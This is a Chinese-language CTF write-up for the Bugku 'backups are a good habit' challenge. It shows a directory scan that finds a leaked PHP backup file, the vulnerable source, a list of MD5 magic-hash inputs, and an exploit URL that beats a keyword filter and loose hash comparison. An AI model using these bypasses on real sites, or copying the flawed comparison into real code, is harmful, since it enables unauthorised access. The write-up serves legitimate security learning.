ctf.bugku-备份是个好习惯

访问页面得到字符串

这串字符串是重复的； d41d8cd98f00b204e9800998ecf8427e

从前端、源码上看，除了这段字符串，没有其他信息；尝试解密，长度32位；各种解密方式试试；

MD5免费在线解密破解_MD5在线加密-SOMD5

解密后是空字符串；没有有用信息；

查看后端：

使用dirsearch 扫描后端服务；

查到一个 index.php.bak 文件  ，代码如下：（注释我自己补上的）

<?php
/**
 * Created by PhpStorm.
 * User: Norse
 * Date: 2017/8/6
 * Time: 20:22
*/

include_once "flag.php";
ini_set("display_errors", 0);
$str = strstr($_SERVER['REQUEST_URI'], '?');   //php strstr() 函数搜索一个字符串在另一个字符串中是否存在，如果是，返回该字符串及后面剩余部分;
$str = substr($str,1);                         // 返回第一个字符后面的字符； 相当于把 ？ 删除；
$str = str_replace('key','',$str);             // 把 key 替换成空格
parse_str($str);                               //把查询字符串解析到变量中：让 key1 = xx ,key2 = yy;
echo md5($key1);                               //key1 回显

echo md5($key2);                               //key2 回显
if(md5($key1) == md5($key2) && $key1 !== $key2){   //比较，若key1 和key2的md5值相等，且key1、key2 不等；得到flay
    echo $flag."取得flag";
}
?>

所以根据代码逆向构造，并且这里使用了一个php 的bug

PHP在处理哈希字符串时，会利用”!=”或”==”来对哈希值进行比较，它把每一个以”0E”开头的哈希值都解释为0，所以如果两个不同的密码经过哈希以后，其哈希值都是以”0E”开头的，那么PHP将会认为他们相同，都是0。

常见payload有：

    QNKCDZO
    240610708
    s878926199a
    s155964671a
    s214587387a
    s214587387a

所以：构造参数

http://114.67.175.224:13384/?kkeyey1=240610708&kkeyey2=QNKCDZO

得到flag

参考文档：

PHP strstr() 函数 | 菜鸟教程 (runoob.com)

PHP 函数漏洞总结 - zw1sh - 博客园 (cnblogs.com)